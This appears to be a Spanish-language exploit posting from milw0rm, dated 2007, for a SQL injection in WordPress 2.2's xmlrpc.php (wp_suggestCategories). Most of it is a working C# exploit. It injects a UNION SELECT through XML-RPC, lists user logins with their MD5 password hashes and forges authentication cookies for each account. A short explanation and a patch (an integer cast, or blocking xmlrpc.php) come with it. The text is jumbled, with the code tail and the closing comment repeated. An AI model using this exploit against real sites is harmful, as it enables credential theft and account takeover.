using (WebClient request = new WebClient())
{
/* Probar con el prefijo por omisión */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));
/* Se hace una nueva petición si la consulta anterior falla */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
}
try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);
XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Mostrar lista de:
* Usuario md5(contraseña)
* Cookie de Autenticación
*
*/
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}
private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;
WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);
if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la lÃnea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php.
o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5.
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]
:: [Slappter] ::
*/
# milw0rm.com [2007-06-06]
Slappter/wp22xmlrpc-sql.txt ( na)
/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb;
$this->escape($args);
$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];
if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}
// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}
$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");
return($category_suggestions);
}
Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima.
Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
code c sharp:
*/
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
class Program
{
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
string data = @"<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>{0}</value></param>
<param><value>{1}</value></param>
<param><value>1</value></param>
<param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param>
</params>
</methodCall>";
string cookieHash = GetCookieHash(targetUrl);
using (WebClient request = new WebClient())
{
/* Probar con el prefijo por omisión */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));
/* Se hace una nueva petición si la consulta anterior falla */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
}
try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);
XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Mostrar lista de:
* Usuario md5(contraseña)
* Cookie de Autenticación
*
*/
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}
private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;
WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);
if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php.
o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5.
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]
:: [Slappter] ::
*/
Wordpress version 2.2 remote SQL injection exploit that makes use of xmlrpc.php.